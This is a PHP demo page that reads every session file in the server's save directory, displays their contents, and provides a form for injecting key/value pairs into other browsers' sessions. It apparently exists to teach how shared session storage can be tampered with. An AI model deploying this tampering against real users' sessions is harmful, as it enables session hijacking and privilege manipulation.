- <?php
- // The "unserializesession" function is from
- // http://www.php.net/manual/en/function.session-decode.php#101687
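/**
 * Decode the raw "php" session serializer format ("key|<serialized>key|<serialized>...")
 * into an associative array.
 *
 * Key markers are located with a regex: a run of [A-Za-z0-9_] followed by "|", at the
 * start of the data or directly after a ";" / "}" terminator. The text between two
 * markers is handed to unserialize(). A value whose own serialized form contains a
 * ";name|" sequence (e.g. inside a string) would be mis-split — a known limitation of
 * this regex-based approach.
 *
 * NOTE: unserialize() here will instantiate any class it finds in the session file.
 * That is fine when the save path only holds sessions written by this script, but if
 * the directory is shared with other applications consider passing
 * ['allowed_classes' => false] as the second argument.
 *
 * @param string $data raw contents of a sess_* file
 * @return array key => decoded value; an empty array for empty or unparseable input
 */
function unserializesession( $data )
{
    // Covers '', null and a failed file_get_contents() (false) alike.
    if ((string) $data === '') {
        return array();
    }

    // match all the session keys and offsets
    preg_match_all('/(^|;|\})([a-zA-Z0-9_]+)\|/i', $data, $matchesarray, PREG_OFFSET_CAPTURE);

    $returnArray = array();
    $lastOffset = null;
    $currentKey = '';
    foreach ($matchesarray[2] as $match) {
        $key = $match[0];
        $offset = $match[1];
        // The previous key's value runs from just after its "|" up to this marker.
        if ($lastOffset !== null) {
            $valueText = substr($data, $lastOffset, $offset - $lastOffset);
            $returnArray[$currentKey] = unserialize($valueText);
        }
        $currentKey = $key;
        $lastOffset = $offset + strlen($key) + 1; // +1 skips the "|"
    }

    // No key marker at all: the input is not in session format. (Previously this fell
    // through and produced a bogus '' => false entry from unserialize() on the raw text.)
    if ($lastOffset === null) {
        return array();
    }

    // The last key's value extends to the end of the data.
    $returnArray[$currentKey] = unserialize(substr($data, $lastOffset));
    return $returnArray;
}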
- // The "session_raw_encode" function is from
- // http://www.php.net/manual/en/function.session-encode.php#76425
/**
 * Encode an array into the raw "php" session serializer format: "key|<serialized>" for
 * each element, concatenated without separators.
 *
 * Each element is replaced by a marker array after it has been written. If a later
 * element already carries that marker, it is emitted as a serialized back-reference
 * ("R:<line>;") to the line that was written first instead of being serialized again —
 * presumably the case where the element aliases an earlier slot (confirm against the
 * original source on php.net).
 *
 * @param array $array the data to encode
 * @param bool  $safe  when true, work on a detached copy (serialize/unserialize round trip)
 *                     so the marker writes never reach the caller's array; the array is
 *                     effectively passed by reference otherwise, whether you want it or not
 * @return string
 */
function session_raw_encode( $array, $safe = true ) {
    if ($safe) {
        $array = unserialize(serialize($array));
    }

    $raw = '';
    $line = 0;
    foreach (array_keys($array) as $key) {
        $current = $array[$key];
        $line++;
        $raw .= $key . '|';

        $isMarker = is_array($current) && isset($current['huge_recursion_blocker_we_hope']);
        $raw .= $isMarker
            ? 'R:' . $current['huge_recursion_blocker_we_hope'] . ';'
            : serialize($current);

        // Leave the marker behind so anything still pointing at this slot sees it.
        $array[$key] = array('huge_recursion_blocker_we_hope' => $line);
    }

    return $raw;
}
/**
 * Read and decode every sess_* file in the session save directory.
 *
 * session_save_path() is handed straight to DirectoryIterator, so this assumes
 * session.save_path is configured as a plain directory (an empty value or the
 * "N;mode;path" form is not handled here).
 *
 * @return array session id (file name without the "sess_" prefix) => decoded session data
 */
function get_sessions()
{
    $found = array();
    foreach (new DirectoryIterator(session_save_path()) as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $name = $entry->getFilename();
        if (strncmp($name, 'sess_', 5) !== 0) {
            continue;
        }
        // A failed read yields false, which the decoder treats as empty data.
        $found[substr($name, 5)] = unserializesession(file_get_contents($entry->getPathname()));
    }
    return $found;
}
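session_start();

// Inject a key/value into another browser's session file. The session id must be one
// that get_sessions() actually found on disk, so the file path built below cannot point
// outside the save directory. The key must be in the character set the decoder's regex
// recognises: a "|" or ";" in it would corrupt the sess_ file format and the injected
// entry (or the ones after it) would never be read back.
if (
    isset($_POST['session_id']) && is_string($_POST['session_id']) &&
    isset($_POST['key']) && is_string($_POST['key']) &&
    isset($_POST['value']) && is_string($_POST['value'])
) {
    $sessions = get_sessions();
    if (
        array_key_exists($_POST['session_id'], $sessions) &&
        preg_match('/^[a-zA-Z0-9_]+$/', $_POST['key']) === 1
    ) {
        $sessions[$_POST['session_id']][$_POST['key']] = $_POST['value'];
        // LOCK_EX: the target session may be in use by another request at this moment;
        // the lock keeps this write from interleaving with a concurrent write to the file.
        file_put_contents(
            session_save_path() . DIRECTORY_SEPARATOR . "sess_{$_POST['session_id']}",
            session_raw_encode($sessions[$_POST['session_id']]),
            LOCK_EX
        );
    }
} elseif (isset($_POST['destroy_this_session'])) {
    // Drop this browser's data, then open a fresh session so the page still has an id to show.
    session_destroy();
    session_start();
}

// Store something per browser so the listing below has content; note this is raw
// client input and must be escaped wherever it is printed.
$_SESSION['user_agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
session_write_close();
$sessions = get_sessions();
?>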
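<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Manipulating Other Users' PHP Sessions</title>
</head>
<body>
<?php
// Everything echoed into the markup below goes through this escaper: the session dump
// contains browser-supplied User-Agent strings and whatever values were injected via the
// form, and PHP_SELF reflects the request path, so none of it is safe as raw HTML.
$esc = function ($text) {
    return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
?>
<h1>Manipulating Other Users' PHP Sessions</h1>
<p>Instructions: open this PHP script in at least two different browsers and mess around with each other's sessions.</p>
<p><code>session_save_path() = <?php echo $esc(session_save_path()); ?></code></p>
<p>This browser's session ID: <code><?php echo $esc(session_id()); ?></code></p>
<h2>Current Session Data</h2>
<pre><?php echo $esc(print_r($sessions, true)); ?></pre>
<hr>
<?php if (count($sessions) <= 1) { // nothing to pick from unless another browser has a session ?>
<p>You must visit this page with another browser in order to continue on.</p>
<?php } else { ?>
<p>Choose a session ID and enter the key and value you'd like to inject into their session.</p>
<form action="<?php echo $esc($_SERVER['PHP_SELF']); ?>" method="post">
<select name="session_id">
<?php
foreach (array_keys($sessions) as $session_id) {
    // Array keys that look like integers come back as int, hence the cast before the strict compare.
    if ((string) $session_id === session_id()) {
        continue;
    }
    echo '<option value="' . $esc($session_id) . '">' . $esc($session_id) . '</option>';
}
?>
</select>
<label for="key">Key:</label> <input type="text" name="key" id="key">
<label for="value">Value:</label> <input type="text" name="value" id="value">
<input type="submit" value="Submit">
</form>
<?php } ?>
<hr>
<form action="<?php echo $esc($_SERVER['PHP_SELF']); ?>" method="post">
<input type="hidden" name="destroy_this_session" value="true">
<input type="submit" value="Destroy This Browser's Session">
</form>
</body>
</html>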